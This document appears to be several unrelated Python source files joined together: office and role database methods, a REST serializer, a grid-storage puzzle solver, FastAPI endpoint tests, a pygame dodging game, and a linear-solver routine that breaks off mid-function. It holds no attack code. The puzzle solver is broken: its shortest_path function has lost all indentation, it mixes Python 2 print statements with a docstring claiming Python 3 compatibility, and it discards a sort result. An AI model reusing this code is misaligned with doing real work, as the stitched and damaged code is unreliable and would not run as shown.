        cur.execute('select user_id,send_mail from offices.offices_roles where office_id in %s and role = %s', (tuple(officesIds), role))
        if cur.rowcount <= 0:
            return []
        users = []
        for data in cur:
            users.append((data[0], data[1]))
        return users

    def addUserToOffices(self, con, officeId, userId):
        """Attach ``userId`` to ``officeId``.

        Provisional behaviour kept from the original: the user is also
        removed from the "new attendance user" fallback group.
        """
        if officeId is None or userId is None:
            return
        cur = con.cursor()
        cur.execute('insert into offices.offices_users (user_id,office_id) values (%s,%s)', (userId, officeId))
        cur = con.cursor()
        cur.execute('delete from offices.offices_users where user_id = %s and office_id = %s', (userId, self._NEW_USER_OFFICE_ID))

    def removeUser(self, con, officeId, userId):
        """Detach ``userId`` from ``officeId``.

        Provisional behaviour kept from the original: a user left without
        any office is put back into the "new attendance user" group.
        """
        if officeId is None or userId is None:
            return
        cur = con.cursor()
        cur.execute('delete from offices.offices_users where user_id = %s and office_id = %s', (userId, officeId))
        offices = self.getOfficesByUser(con, userId, False, False)
        if offices is None or len(offices) == 0:
            cur.execute('insert into offices.offices_users (user_id,office_id) values (%s,%s)', (userId, self._NEW_USER_OFFICE_ID))

    def persist(self, con, office):
        """Insert ``office`` when it carries no id, otherwise update it.

        Raises Exception when the requested parent is one of the office's
        own descendants (that would create a cycle).
        """
        if office is None or 'name' not in office:
            return
        cur = con.cursor()
        parent = office.get('parent')
        if parent is not None and parent != '' and 'id' in office:
            # The new parent must not be a descendant of this office.
            childrens = self._getChildOffices(con, [office['id']])
            for child in childrens:
                if child['id'] == parent:
                    raise Exception('Error: la oficina padre es al mismo tiempo un hijo')
        telephone = office.get('telephone')
        email = office.get('email')
        name = office['name']
        params = [parent, name, telephone, email]
        if 'id' not in office:
            params.append(str(uuid.uuid4()))
            cur.execute('insert into offices.offices (parent,name,telephone,email,id) values(%s,%s,%s,%s,%s)', params)
        else:
            params.append(office['id'])
            cur.execute('update offices.offices set parent = %s, name = %s, telephone = %s, email = %s where id = %s', params)

    def addRole(self, con, userId, officeId, role, sendMail=True):
        """Grant ``role`` to ``userId`` on ``officeId`` unless already present;
        ``sendMail`` is stored alongside the assignment."""
        if userId is None or officeId is None or role is None:
            return
        cur = con.cursor()
        if not self._includeRole(con, userId, officeId, role):
            cur.execute('insert into offices.offices_roles (user_id,office_id,role,send_mail) values(%s,%s,%s,%s)', (userId, officeId, role, sendMail))

    def _includeRole(self, con, userId, officeId, role):
        """Return True when the (user, office, role) assignment exists."""
        if userId is None or officeId is None or role is None:
            return False
        cur = con.cursor()
        cur.execute('select role from offices.offices_roles where user_id = %s and office_id = %s and role = %s', (userId, officeId, role))
        rows = cur.fetchall()
        return rows is not None and len(rows) > 0

    def deleteRole(self, con, userId, officeId, role):
        """Revoke ``role`` from ``userId`` on ``officeId``."""
        if userId is None or officeId is None or role is None:
            return
        cur = con.cursor()
        cur.execute('delete from offices.offices_roles where user_id = %s and office_id = %s and role = %s', (userId, officeId, role))

    def getRolesAdmin(self, con, userId, officesId, usersId):
        """Return the roles ``userId`` may assign for the given offices/users.

        HACK kept from the original: temporarily returns the fixed
        attendance role list regardless of the arguments.
        """
        if officesId is None or len(officesId) == 0:
            return []
        return ['autoriza', 'horas-extras', 'realizar-solicitud',
                'realizar-solicitud-admin', 'admin-office', 'manage-positions']

    def getAssignedRoles(self, con, officesId, usersId, roles):
        """Return the roles (among ``roles``) held by *all* of ``usersId`` on
        *all* of ``officesId``, as [{'name': ..., 'send_mail': ...}]."""
        if (officesId is None or len(officesId) == 0) or (usersId is None or len(usersId) == 0) or (roles is None or len(roles) == 0):
            return []
        rolesAssigned = []
        cur = con.cursor()
        cur.execute('select role, office_id, user_id, send_mail from offices.offices_roles where user_id in %s and office_id in %s and role in %s order by role,office_id, send_mail', (tuple(usersId), tuple(officesId), tuple(roles)))
        rows = cur.fetchall()
        if rows is not None:
            rolesDict = {}
            for row in rows:
                if row[0] not in rolesDict:
                    rolesDict[row[0]] = {'count': 0}
                role = rolesDict[row[0]]
                # Fold in send_mail (False wins over True).
                self._setSendMail(role, row[3])
                # Count how many (user, office) pairs carry this role.
                role["count"] = role["count"] + 1
            for role in rolesDict.keys():
                count = rolesDict[role]["count"]
                # Only roles present for every (office, user) pair qualify.
                if count == (len(officesId) * len(usersId)):
                    rolesAssigned.append({'name': role, 'send_mail': rolesDict[role]["send_mail"]})
        return rolesAssigned

    def _setSendMail(self, role, v):
        """Store ``v`` as role['send_mail']; a falsy value always overrides a
        previously stored truthy one."""
        if 'send_mail' not in role or not v:
            role['send_mail'] = v
|
from rest_framework import serializers
from camera.models import Camera
class CameraSerializer(serializers.ModelSerializer):
    """DRF serializer exposing every field of the Camera model."""
    class Meta:
        model = Camera
        fields = '__all__'
|
from collections import namedtuple
from copy import deepcopy
from hashlib import md5
class Node(object):
    """One storage node of the grid: a position, a capacity and a fill level."""

    def __init__(self, pos, size, used, source=False):
        self.pos = pos
        self.size = size
        self.used = used
        self.source = source  # True when this node holds the goal data

    def __repr__(self):
        marker = 'X' if self.source else '0'
        x, y = self.pos
        return '<(%s,%s) %2sT %2sT %s>' % (x, y, self.used, self.size, marker)

    @property
    def avail(self):
        """Free capacity remaining on this node."""
        return self.size - self.used
def parse_filesize(size):
    """Convert a size string such as '85T' into its integer terabyte count."""
    digits = size[:len(size) - 1]  # drop the trailing unit character
    return int(digits)
def parse_position(filename):
    """Extract (x, y) from a node path like '/dev/grid/node-x2-y5'."""
    basename = filename.rsplit('/', 1)[-1]
    x_part, y_part = basename.split('-')[1:]
    return int(x_part[1:]), int(y_part[1:])
def get_grid_size(nodes):
    """Return (max_x, max_y) over all node positions.

    Bug fix: the original used ``elif``, so a node could never update both
    maxima in one iteration — e.g. a single node at (4, 7) was reported as a
    (4, 0) grid. Both axes are now checked independently.
    """
    max_x, max_y = 0, 0
    for node in nodes:
        if node.pos[0] > max_x:
            max_x = node.pos[0]
        if node.pos[1] > max_y:
            max_y = node.pos[1]
    return max_x, max_y
def parse_input(data):
    """Parse the df-style node listing into a sorted list of Node objects."""
    nodes = []
    # The first two lines are headers and carry no node data.
    for line in data.split('\n')[2:]:
        fields = line.split()
        position = parse_position(fields[0])
        size = parse_filesize(fields[1])
        used = parse_filesize(fields[2])
        nodes.append(Node(position, size, used))
    grid = get_grid_size(nodes)
    # Row-major order: by y, then by x offset within the row.
    nodes.sort(key=lambda node: (node.pos[1], node.pos[0] + grid[1] * node.pos[1]))
    return nodes
def viable_pairs(nodes):
    """Yield every viable (A, B) pair: A holds data, all of it fits in B's
    free space, and A and B are different nodes.

    Bug fix: the original also yielded a node paired with itself whenever
    its used amount fit into its own free space, which the pairing rules
    explicitly exclude.
    """
    for node_a in nodes:
        for node_b in nodes:
            if node_a is node_b:
                continue
            if 0 < node_a.used <= node_b.avail:
                yield node_a, node_b
def get_node(data, x, y, grid_width):
    """Fetch the node at (x, y) from the row-major node list."""
    row_stride = grid_width + 1  # a grid of width W has W+1 columns
    return data[y * row_stride + x]
def available_moves(data, size):
    """Yield ((from_x, from_y), (to_x, to_y)) for every legal data move.

    A move is legal when the origin node holds data and an orthogonal
    neighbour has enough free space to absorb all of it.
    """
    offsets = ((1, 0), (0, 1), (-1, 0), (0, -1), )
    max_x, max_y = size[0], size[1]
    for x in range(max_x + 1):
        for y in range(max_y + 1):
            node = get_node(data, x, y, max_x)
            if node.used == 0:
                # Nothing to move from here.
                continue
            for dx, dy in offsets:
                nx, ny = x + dx, y + dy
                if 0 <= nx <= max_x and 0 <= ny <= max_y:
                    dest = get_node(data, nx, ny, max_x)
                    if dest.avail >= node.used:
                        yield (x, y), (nx, ny)
def cost(data, grid_width):
    """Manhattan distance of the goal-data node from the origin (0, 0)."""
    for index, node in enumerate(data):
        if node.source:
            break
    stride = grid_width + 1
    return index % stride + index // stride
def build_key(data):
    """Build a unique fingerprint (md5 hex digest) for a grid state.

    Fix: md5.update() requires bytes on Python 3, so the node repr is
    encoded first; str.encode('utf-8') also works on Python 2 for the
    ASCII reprs produced here.
    """
    hasher = md5()
    for node in data:
        hasher.update(str(node).encode('utf-8'))
    return hasher.hexdigest()
def shortest_path(data):
"""Find the shortest path for moving data from (X, 0) to (0, 0).
This isn't as simple as it appears as we may have to perform other
moves in order to clear the path for us to move into. Thus we
perform a breadth first search minimising our cost (distance from
target) and then optimize based on that.
"""
size = get_grid_size(data)
grid_x = size[0]
# Mark our destination node so we can follow it around.
data[grid_x].source = True
paths = [
[data, 0, cost(data, grid_x)],
]
shortest_path_length = None
seen = set()
while True:
new_paths = []
lowest_cost = paths[0][-1]
print '###', len(paths), lowest_cost
for path in paths:
data, steps, data_cost = path
if data_cost > lowest_cost:
# Don't follow just yet. Explore lowest cost items
# first
new_paths.append(path)
continue
for move in available_moves(data, size):
new_data = [deepcopy(n) for n in data]
origin_node = get_node(new_data, move[0][0], move[0][1], grid_x)
dest_node = get_node(new_data, move[1][0], move[1][1], grid_x)
dest_node.used += origin_node.used
origin_node.used = 0
key = build_key(new_data)
if key in seen:
continue
seen.add(key)
if origin_node.source:
dest_node.source = True
origin_node.source = False
if cost(new_data, grid_x) == 0:
print 'FOUND THE SHORTEST PATH', steps
if not shortest_path_length or shortest_path_length > steps:
shortest_path_length = steps
continue
if shortest_path_length and steps >= shortest_path_length:
continue
new_paths.append((new_data, steps + 1, cost(new_data, grid_x)))
paths = new_paths
sorted(paths, key=lambda path: path[-1])
if not paths:
# We've extinguished all possible viable paths, we're done!
break
return shortest_path_length + 1
def test():
    """Sanity-check the parser and solver against the worked example grid."""
    test_input = """
Filesystem Size Used Avail Use%
/dev/grid/node-x0-y0 10T 8T 2T 80%
/dev/grid/node-x0-y1 11T 6T 5T 54%
/dev/grid/node-x0-y2 32T 28T 4T 87%
/dev/grid/node-x1-y0 9T 7T 2T 77%
/dev/grid/node-x1-y1 8T 0T 8T 0%
/dev/grid/node-x1-y2 11T 7T 4T 63%
/dev/grid/node-x2-y0 10T 6T 4T 60%
/dev/grid/node-x2-y1 9T 8T 1T 88%
/dev/grid/node-x2-y2 9T 6T 3T 66%"""
    data = parse_input(test_input)
    # The example is a 3x3 grid whose answer is 7 moves.
    assert get_grid_size(data) == (2, 2)
    assert shortest_path(data) == 7
def main():
    """Run the example self-test, then solve both parts for 22.txt."""
    test()
    with open('22.txt') as fin:
        data = parse_input(fin.read())
    print 'The number of viable pairs is %s.' % len(list(viable_pairs(data)))
    # 958 is incorrect, too high
    # 815 is incorrect, too low
    print 'The shortest path is %s.' % shortest_path(data)
|
from fastapi.testclient import TestClient
from unittest import TestCase
from unittest.mock import MagicMock, patch
from requests import Response
from src.server import app
@patch('src.server.Monitoring', autospec=True)
@patch('src.server.FactorialSolver', autospec=True)
@patch('src.server.RedisCache', autospec=True)
@patch('src.server.FibonacciSolver', autospec=True)
class TestFibonacciService(TestCase):
    """HTTP-level tests of the /fibonacci/{n} endpoint.

    All collaborators are patched out; mock instances arrive via *args in
    bottom-up decorator order, so FibonacciSolver is the first argument.
    """

    def test_requires_number(self, *args):
        with TestClient(app) as client:
            assert self._call_fibonacci_service(client, '').status_code == 404

    def test_accept_zero_number(self, *args):
        with TestClient(app) as client:
            assert self._call_fibonacci_service(client, '0').status_code == 200

    def test_call_computation_fibonacci_with_parameter(self, fibonacci_solver: MagicMock, *args):
        number = 10
        with TestClient(app) as client:
            fibonacci_solver.return_value.solve.return_value = 1
            self._call_fibonacci_service(client, str(number))
            fibonacci_solver.return_value.solve.assert_called_with(number)

    def test_returns_result_computation_fibonacci(self, fibonacci_solver: MagicMock, *args):
        expected = 11
        with TestClient(app) as client:
            fibonacci_solver.return_value.solve.return_value = expected
            payload = self._call_fibonacci_service(client, '6').json()
            assert payload['result'] == expected

    def _call_fibonacci_service(self, client, n: str) -> Response:
        return client.get(f'/fibonacci/{n}')
@patch('src.server.Monitoring', autospec=True)
@patch('src.server.FibonacciSolver', autospec=True)
@patch('src.server.RedisCache', autospec=True)
@patch('src.server.FactorialSolver', autospec=True)
class TestFactorialService(TestCase):
    """HTTP-level tests of the /factorial/{n} endpoint.

    All collaborators are patched out; mock instances arrive via *args in
    bottom-up decorator order, so FactorialSolver is the first argument.
    """

    def test_requires_number(self, *args):
        with TestClient(app) as client:
            assert self._call_factorial_service(client, '').status_code == 404

    def test_requires_positive_number(self, *args):
        with TestClient(app) as client:
            assert self._call_factorial_service(client, str(-10)).status_code == 422

    def test_accept_zero_number(self, *args):
        with TestClient(app) as client:
            assert self._call_factorial_service(client, '0').status_code == 200

    def test_call_computation_factorial_with_parameter(self, factorial_solver: MagicMock, *args):
        number = 10
        with TestClient(app) as client:
            self._call_factorial_service(client, str(number))
            factorial_solver.return_value.solve.assert_called_with(number)

    def test_returns_result_computation_factorial(self, factorial_solver: MagicMock, *args):
        expected = 11
        with TestClient(app) as client:
            factorial_solver.return_value.solve.return_value = expected
            payload = self._call_factorial_service(client, '6').json()
            assert payload['result'] == expected

    def _call_factorial_service(self, client: TestClient, n: str) -> Response:
        return client.get(f'/factorial/{n}')
|
import pygame
import random
from os import path
import os

# Initialise pygame.
pygame.init()
# The game's single sound effect: the player's ball colliding with an enemy.
pygame.mixer.init()
# NOTE(review): path.dirname('Bump.wav') is '', so snd_dir is just 'snd' —
# confirm the sound is expected to live in ./snd/Bump.wav.
snd_dir = path.join(path.dirname('Bump.wav'), 'snd')
boom_snd = pygame.mixer.Sound(path.join(snd_dir, 'Bump.wav'))
# Every wall-to-wall crossing time (left-to-right and back) is stored here.
records = []
# Screen.
size = width, height = 1000, 500
screen = pygame.display.set_mode(size)
# Frame clock.
clock = pygame.time.Clock()
# Sprite groups used for collision handling.
all_sprites = pygame.sprite.Group()
horizontal_borders = pygame.sprite.Group()
vertical_borders = pygame.sprite.Group()
Crush = pygame.sprite.Group()
# Parameters of the player-controlled ball.
BLUE = (0, 70, 225)
x = 30
y = height // 2
r = 15
# Boolean game-state flags.
first = True
kill_them_all = False
wall_1_to_wall_2 = True   # currently travelling from the left wall to the right
wall_2_to_wall_1 = False  # currently travelling from the right wall to the left
menu = True
enemy = False
enemy_go = False          # whether the chasing black ball is enabled
timer_started = True
done = False
play = False
# Font and text colours.
font = pygame.font.Font(None, 54)
font_color = pygame.Color('black')
second_color = pygame.Color('blue')
# Elapsed time.
passed_time = 0
# Also used by the stopwatch.
old_tick = 0
# Image loading helper.
def load_image(name, color_key=None):
    """Load an image from the img/ directory.

    color_key == -1 uses the top-left pixel as the transparent colour; any
    other non-None value is used directly; None keeps per-pixel alpha.
    Exits the program when the file cannot be loaded.
    """
    fullname = os.path.join('img', name)
    try:
        image = pygame.image.load(fullname)
    except pygame.error as message:
        print('Cannot load image:', name)
        raise SystemExit(message)
    if color_key is None:
        return image.convert_alpha()
    if color_key == -1:
        color_key = image.get_at((0, 0))
    image.set_colorkey(color_key)
    return image
# Load the sprite images used by the menu and the chaser.
small_image = load_image("small_ball.png")
average_image = load_image("average_ball.png")
big_image = load_image("big_ball.png")
enemy_image = load_image("enemy_ball.png")
# Collision proxy for the player's ball: when it touches a red ball, the
# player is sent back to the start.
class Hitbox(pygame.sprite.Sprite):
    """Invisible rect tracking the player ball's global position and size."""

    def __init__(self):
        super().__init__(all_sprites)
        self.add(Crush)
        # Transparent surface; only the rect matters for collisions.
        self.image = pygame.Surface((r, r), pygame.SRCALPHA, 32)
        self.rect = pygame.Rect(x, y, r, r)

    def update(self, X):
        # Follow the player's current global position/size every frame.
        self.rect = pygame.Rect(x, y, r, r)
# Behaviour of the red enemy ball: its initial direction, bouncing off
# surfaces, and sending the player back to the start on collision.
class Ball(pygame.sprite.Sprite):
    def __init__(self, radius, X, Y):
        super().__init__(all_sprites)
        self.radius = radius
        self.image = pygame.Surface((2 * radius, 2 * radius), pygame.SRCALPHA, 32)
        pygame.draw.circle(self.image, pygame.Color("red"), (radius, radius), radius)
        self.rect = pygame.Rect(X, Y, 2 * radius, 2 * radius)
        # Random initial velocity; either component may be zero.
        self.vx = random.randint(-6, 6)
        self.vy = random.randint(-6, 6)

    def update(self, X):
        global x
        global y
        self.rect = self.rect.move(self.vx, self.vy)
        # Bounce off horizontal / vertical borders.
        if pygame.sprite.spritecollideany(self, horizontal_borders):
            self.vy = -self.vy
        if pygame.sprite.spritecollideany(self, vertical_borders):
            self.vx = -self.vx
        # Hit the player: play the bump sound and reset the player back to
        # the wall it last departed from.
        if pygame.sprite.spritecollideany(self, Crush):
            boom_snd.play()
            print(x, y)
            if wall_1_to_wall_2:
                x = 30
                y = height // 2
            if wall_2_to_wall_1:
                x = width - 30
                y = height // 2
# The black ball that chases the player.
class Following_Ball(pygame.sprite.Sprite):
    def __init__(self, radius, X, Y):
        super().__init__(all_sprites)
        self.radius = radius
        self.x = X
        self.y = Y
        self.radius = radius
        self.image = pygame.Surface((2 * self.radius, 2 * self.radius), pygame.SRCALPHA, 32)
        pygame.draw.circle(self.image, pygame.Color("black"), (self.radius, self.radius), self.radius)
        self.rect = pygame.Rect(self.x, self.y, 2 * self.radius, 2 * self.radius)
        self.x = X
        self.y = Y

    def update(self, X):
        global x
        global y
        global stop
        # Step 5px towards the player's current position on each axis.
        if self.x < x:
            self.x += 5
            self.rect = self.rect.move(5, 0)
        elif self.x > x:
            self.x -= 5
            self.rect = self.rect.move(-5, 0)
        if self.y < y:
            self.y += 5
            self.rect = self.rect.move(0, 5)
        elif self.y > y:
            self.y -= 5
            self.rect = self.rect.move(0, -5)
        # Leaving the play area horizontally teleports the chaser back to
        # the centre of the screen.
        if self.x < 60 or self.x > width - 60:
            self.x = width // 2
            self.y = height // 2
            self.rect = pygame.Rect(self.x, self.y, 2 * self.radius, 2 * self.radius)
        # Caught the player: bump sound, reset player to its start wall.
        if pygame.sprite.spritecollideany(self, Crush):
            boom_snd.play()
            if wall_1_to_wall_2:
                x = 30
                y = height // 2
            if wall_2_to_wall_1:
                x = width - 30
                y = height // 2
# Wall class.
class Border(pygame.sprite.Sprite):
    """A strictly vertical or strictly horizontal 1px wall segment."""

    def __init__(self, x1, y1, x2, y2):
        super().__init__(all_sprites)
        vertical = x1 == x2
        if vertical:
            self.add(vertical_borders)
            self.image = pygame.Surface([1, y2 - y1])
            self.rect = pygame.Rect(x1, y1, 1, y2 - y1)
        else:
            self.add(horizontal_borders)
            self.image = pygame.Surface([x2 - x1, 1])
            self.rect = pygame.Rect(x1, y1, x2 - x1, 1)
# The walls themselves: top, bottom, and the two finish lines at x=50 and
# x=width-50.
Border(5, 0, width - 5, 0)
Border(10, height, width - 5, height)
Border(50, 5, 50, height - 5)
Border(width - 50, 5, width - 50, height - 5)
# Initial stopwatch text.
text = font.render(str(passed_time / 1000), True, font_color)
# Collision hitbox for the blue player ball.
Hitbox()
# Delay before key-repeat events start.
pygame.key.set_repeat(25)
# Time since start.
start_time = pygame.time.get_ticks()
keys = pygame.key.get_pressed()
# Loop flags for the menu and the main game functions.
running = True
run = True
# Button that starts the game when clicked.
class button():
    """Menu button whose draw() returns True on click and also flips the
    module-level run/running flags to leave the menu loop."""

    def __init__(self, surf, x, y, width, height):
        self.x = x
        self.y = y
        self.surf = surf  # surface to draw onto
        self.width = width
        self.height = height
        self.counter = 0  # click counter; depends on clock.tick()

    def draw(self):
        global run
        global running
        mouse = pygame.mouse.get_pos()
        click = pygame.mouse.get_pressed()
        hovered = self.x < mouse[0] < self.x + self.width and self.y < mouse[1] < self.y + self.height
        if not hovered:
            pygame.draw.rect(self.surf, (100, 200, 100), (self.x, self.y, self.width, self.height))
            return None
        pygame.draw.rect(self.surf, (150, 150, 40), (self.x, self.y, self.width, self.height))
        if click[0] == 1:
            # Clicked: leave the menu, enter the game loop.
            run = False
            running = True
            return True
        # Hovered but not clicked: overdraw with the hover colour.
        pygame.draw.rect(self.surf, (100, 100, 150), (self.x, self.y, self.width, self.height))
        return None
# A plain toggle button (no game-start side effects).
class button2():
    """Menu button whose draw() returns True while hovered and clicked."""

    def __init__(self, surf, x, y, width, height):
        self.x = x
        self.y = y
        self.surf = surf  # surface to draw onto
        self.width = width
        self.height = height
        self.counter = 0  # click counter; depends on clock.tick()

    def draw(self):
        global run
        mouse = pygame.mouse.get_pos()
        click = pygame.mouse.get_pressed()
        hovered = self.x < mouse[0] < self.x + self.width and self.y < mouse[1] < self.y + self.height
        if not hovered:
            pygame.draw.rect(self.surf, (100, 200, 100), (self.x, self.y, self.width, self.height))
            return None
        pygame.draw.rect(self.surf, (150, 150, 40), (self.x, self.y, self.width, self.height))
        if click[0] == 1:
            return True
        # Hovered but not clicked: overdraw with the hover colour.
        pygame.draw.rect(self.surf, (100, 100, 150), (self.x, self.y, self.width, self.height))
        return None
# Menu screen.
def drawMenu():
    """Show the start menu: difficulty, ball size and chaser on/off.

    Runs until one of the start buttons is clicked (the button itself
    clears the module-level ``run`` flag). Selections mutate the globals
    ``r`` (player ball radius) and ``enemy_go`` (chaser enabled).
    """
    global r
    global enemy
    global enemy_go
    pygame.init()
    pygame.display.set_caption('game')
    clock = pygame.time.Clock()
    screen.fill(pygame.Color("white"))
    # Difficulty start buttons.
    startGame = button(screen, 10, 10, 120, 60)
    textEasy = font.render('Easy', True, font_color)
    screen.blit(textEasy, (10, 70))
    startGame2 = button(screen, 330, 10, 120, 60)
    textNormal = font.render('Normal', True, font_color)
    screen.blit(textNormal, (330, 70))
    startGame3 = button(screen, 650, 10, 120, 60)
    textHard = font.render('Hard', True, font_color)
    screen.blit(textHard, (650, 70))
    # Player ball size buttons.
    Ball_size = button2(screen, 10, 300, 120, 60)
    textSmall = font.render('Small', True, font_color)
    screen.blit(small_image, (100, 300))
    screen.blit(textSmall, (10, 380))
    Ball_size2 = button2(screen, 330, 300, 120, 60)
    textAverage = font.render('Average', True, font_color)
    screen.blit(average_image, (430, 290))
    screen.blit(textAverage, (330, 380))
    Ball_size3 = button2(screen, 650, 300, 120, 60)
    textBig = font.render('Big', True, font_color)
    screen.blit(big_image, (750, 285))
    screen.blit(textBig, (650, 380))
    # Chaser on/off buttons.
    Follow_for_you = button2(screen, 10, 160, 120, 60)
    textFollow = font.render('Enemy', True, font_color)
    screen.blit(enemy_image, (130, 160))
    screen.blit(textFollow, (10, 220))
    Not_Follow_for_you = button2(screen, 650, 160, 120, 60)
    textNot_follow = font.render('Not enemy', True, font_color)
    screen.blit(textNot_follow, (650, 220))
    while run:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        # Easy: 30 enemy balls in three rows.
        if startGame.draw():
            for i in range(10):
                Ball(15, width // 2, 9)
            for i in range(10):
                Ball(15, width // 2, height - 30)
            for i in range(10):
                Ball(15, width // 2, height // 2)
        # Normal: 60 enemy balls in three rows.
        if startGame2.draw():
            for i in range(20):
                Ball(15, width // 2, 9)
            for i in range(20):
                Ball(15, width // 2, height - 30)
            for i in range(20):
                Ball(15, width // 2, height // 2)
        # Hard: 100 enemy balls at random positions.
        if startGame3.draw():
            for i in range(100):
                Ball(15, random.randint(60, 900), random.randint(25, 475))
        # Size selection: highlight the chosen label, set the radius and
        # rebuild the hitbox at the new size.
        if Ball_size.draw():
            textSmall = font.render('Small', True, second_color)
            screen.blit(textSmall, (10, 380))
            textBig = font.render('Big', True, font_color)
            screen.blit(textBig, (650, 380))
            r = 5
            Hitbox()
        if Ball_size2.draw():
            textAverage = font.render('Average', True, second_color)
            screen.blit(textAverage, (330, 380))
            textSmall = font.render('Small', True, font_color)
            screen.blit(textSmall, (10, 380))
            textBig = font.render('Big', True, font_color)
            screen.blit(textBig, (650, 380))
            r = 15
            Hitbox()
        if Ball_size3.draw():
            textBig = font.render('Big', True, second_color)
            screen.blit(textBig, (650, 380))
            textAverage = font.render('Average', True, font_color)
            screen.blit(textAverage, (330, 380))
            textSmall = font.render('Small', True, font_color)
            screen.blit(textSmall, (10, 380))
            r = 25
            Hitbox()
        # Chaser toggle: highlight the chosen label and flip enemy_go.
        if Follow_for_you.draw():
            textNot_follow = font.render('Not enemy', True, font_color)
            textFollow = font.render('Enemy', True, second_color)
            screen.blit(textFollow, (10, 220))
            screen.blit(textNot_follow, (650, 220))
            enemy_go = True
        if Not_Follow_for_you.draw():
            textFollow = font.render('Enemy', True, font_color)
            textNot_follow = font.render('Not enemy', True, second_color)
            screen.blit(textFollow, (10, 220))
            screen.blit(textNot_follow, (650, 220))
            enemy_go = False
        clock.tick(20)
        pygame.display.update()
# Launch the menu (blocks until a start button is clicked).
drawMenu()
# Spawn the chaser if it was enabled in the menu.
if enemy_go:
    Following_Ball(10, random.randint(60, 900), random.randint(25, 475))
# Load the background track (credit: Team Meat / Danny Baranowsky).
# NOTE(review): the backslash makes this path Windows-only — confirm.
file = f'{os.path.abspath("snd")}\Forest Funk.mp3'
pygame.mixer.music.load(file)
pygame.mixer.music.play(-1)
# -1 above loops the track forever; play it at reduced volume.
pygame.mixer.music.set_volume(0.2)
# Main game loop
def game():
    """Run the gameplay loop until the window is closed or Escape returns to the menu.

    The player steers a circle between two walls; lap times between wall
    crossings are recorded in ``records`` and the best time is displayed.
    All state is shared with the menu code through module-level globals.
    """
    global running
    global start_time
    global passed_time
    global x
    global y
    global wall_1_to_wall_2
    global wall_2_to_wall_1
    global first
    global text
    global run
    global enemy_go
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            # Mouse movement makes the game objects do pointless extra work,
            # so that event type is skipped entirely.
            if event.type != pygame.MOUSEMOTION:
                if timer_started:
                    # Elapsed time of the current run, in milliseconds.
                    passed_time = pygame.time.get_ticks() - start_time
                # White background
                screen.fill(pygame.Color("white"))
                # Draw all game objects
                all_sprites.draw(screen)
                # The player-controlled ball is drawn separately here.
                pygame.draw.circle(screen, BLUE, (x, y), r)
                # Keyboard state snapshot
                keys = pygame.key.get_pressed()
                # Ball position before this event is applied.
                old_pos = (x, y)
                if wall_1_to_wall_2:
                    if x > 50:
                        if keys[pygame.K_UP] or keys[pygame.K_DOWN] or keys[pygame.K_LEFT] or keys[pygame.K_RIGHT]:
                            text = font.render(str(passed_time / 1000), True, font_color)
                            screen.blit(text, (55, 30))
                    else:
                        # Still at the start wall: keep resetting the stopwatch.
                        start_time = pygame.time.get_ticks()
                if wall_2_to_wall_1:
                    if x < width - 50:
                        if keys[pygame.K_UP] or keys[pygame.K_DOWN] or keys[pygame.K_LEFT] or keys[pygame.K_RIGHT]:
                            text = font.render(str(passed_time / 1000), True, font_color)
                            screen.blit(text, (55, 30))
                    else:
                        start_time = pygame.time.get_ticks()
                # When the player crosses the finish wall, the lap time is
                # recorded. Only complete wall-to-wall runs count: starting a
                # run and turning back is not recorded.
                if x == (width - 50):
                    if wall_1_to_wall_2:
                        records.append(passed_time / 1000)
                        wall_2_to_wall_1 = True
                        wall_1_to_wall_2 = False
                        first = False
                if x == 50:
                    if wall_2_to_wall_1:
                        records.append(passed_time / 1000)
                        wall_1_to_wall_2 = True
                        wall_2_to_wall_1 = False
                # Show the best (minimum) recorded lap time once one exists.
                if first:
                    pass
                else:
                    text2 = font.render(str(min(records)), True, font_color)
                    screen.blit(text2, (width - 145, 30))
                # Movement: diagonal combinations are checked first so that
                # holding two arrows moves diagonally instead of axis-only.
                if keys[pygame.K_UP] and keys[pygame.K_LEFT]:
                    x -= 10
                    y -= 10
                elif keys[pygame.K_UP] and keys[pygame.K_RIGHT]:
                    x += 10
                    y -= 10
                elif keys[pygame.K_DOWN] and keys[pygame.K_LEFT]:
                    x -= 10
                    y += 10
                elif keys[pygame.K_DOWN] and keys[pygame.K_RIGHT]:
                    x += 10
                    y += 10
                elif keys[pygame.K_LEFT]:
                    x -= 10
                elif keys[pygame.K_RIGHT]:
                    x += 10
                elif keys[pygame.K_UP]:
                    y -= 10
                elif keys[pygame.K_DOWN]:
                    y += 10
                elif keys[pygame.K_ESCAPE]:
                    # Escape leaves the game and re-opens the menu.
                    run = True
                    running = False
                    drawMenu()
                # Keep the ball inside the playing field.
                screen.blit(text, (55, 30))
                if x < 0:
                    x = 0
                if x > width:
                    x = width
                if y < 0:
                    y = 0
                if y > height:
                    y = height - 5
                # If the player did not move, all objects stay static —
                # even the stopwatch only advances while the player moves.
                if (x, y) != old_pos:
                    all_sprites.update(event)
                pygame.display.flip()
# Run the game loop, then shut pygame down once it exits.
game()
pygame.quit()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import math
import random
import time
def Two_norm(x):
    """Return the Euclidean (2-)norm of the n*1 matrix ``x``, i.e. sqrt(x^T x)."""
    # x.T * x is a 1*1 matrix; pull the scalar out before taking the root.
    squared_norm = (x.T * x).item(0)
    return math.sqrt(squared_norm)
def Alpha_beta(x, y, z):
    """Solve the 2x2 least-squares system for ``min || z - alpha*x - beta*y ||``.

    ``x``, ``y``, ``z`` are n*1 matrices. Returns the scalar pair
    ``(alpha, beta)`` obtained from the (symmetrized) normal equations.
    """
    gram_xx = (x.T * x).item(0)                    # <x, x>
    gram_yy = (y.T * y).item(0)                    # <y, y>
    gram_xy = ((x.T * y + y.T * x) / 2).item(0)    # symmetrized <x, y>
    det = gram_xx * gram_yy - gram_xy ** 2         # Gram determinant
    rhs_x = ((z.T * x + x.T * z) / 2).item(0)      # symmetrized <z, x>
    rhs_y = ((z.T * y + y.T * z) / 2).item(0)      # symmetrized <z, y>
    alpha = (rhs_x * gram_yy - rhs_y * gram_xy) / det
    beta = (gram_xx * rhs_y - rhs_x * gram_xy) / det
    return alpha, beta
def Subspace_method_1(A,b,x,epsilon):
    # Solve A x = b by 2D subspace projection with directions u = x_k, v = r_k.
    # A: n*n non-singular matrix, x: n*1 initial guess, b: n*1 right-hand side.
    # Returns (x^T, r^T, ||r||, iterations).
    StartTime = time.time()
    r = b - A * x  # n*1 residual matrix r
    r_norm = Two_norm(r)  # 2-norm of r
    iter_num = 0  # iteration counter
    x0 = x  # previous-step solution
